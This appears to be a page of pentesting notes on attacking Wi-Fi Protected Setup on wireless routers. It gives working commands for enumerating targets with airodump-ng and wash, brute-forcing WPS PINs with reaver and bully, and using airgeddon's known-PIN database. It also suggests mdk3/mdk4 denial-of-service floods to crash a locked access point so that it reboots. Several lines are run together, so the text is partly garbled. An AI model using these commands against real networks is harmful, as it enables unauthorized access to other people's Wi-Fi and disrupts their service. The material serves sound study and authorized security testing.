WPS
Enum:
airodump-ng
airodump-ng --wps wlan0monWash
wash -i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID
--------------------------------------------------------------------------------
00:0A:D0:97:39:6F 1 -88 2.0 No Broadcom linksysVersion 2 mandated mitigations to prevent brute forcing, which may just slow down a bruteforce attack. The Lck indicates if WPS is locked, meaning an attack is pointless at this time.
Wash scans the 2.4GHz band by default. To make it scan 5GHz, we can append the -5 option to the command.
Attack:
Reaver:
sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -kadd the channel parameter (-c) followed by the channel.
Bully:
bully -d -v 4 -m wlan0monOnce the PIN is recovered, we can provide it to bully to do a single PIN try, using -B -p followed by the PIN, to recover the passphrase.
Both reaver and bully can verify a single pin, and in order to use an empty PIN, we will use -p ''
Airegeddon:
install:
sudo apt install airgeddonWe'll use source to execute a shell script, known_pins.db, which loads an array of PINs into memory. Finally, we'll check the database for an AP whose BSSID starts with "0013F7". It is case sensitive and the first three bytes must be uppercase.
source /usr/share/airgeddon/known_pins.db
echo ${PINDB["0013F7"]}Potential issues:
restart if:
[!] WPS transaction failed (code: 0x03), re-trying last pinWPS Lock
When WPS is locked, we can do a denial of service on the access point using mdk31 or its successor, mdk4. In some cases, this will trigger a reboot of the AP, which releases the lock.
We can use authentication DoS, EAPOL Start DoS, or the EAPOL Logoff flood attack. We may need multiple wireless cards to carry out the attack, overflow the AP, and make it crash so that it reboots.
Last updated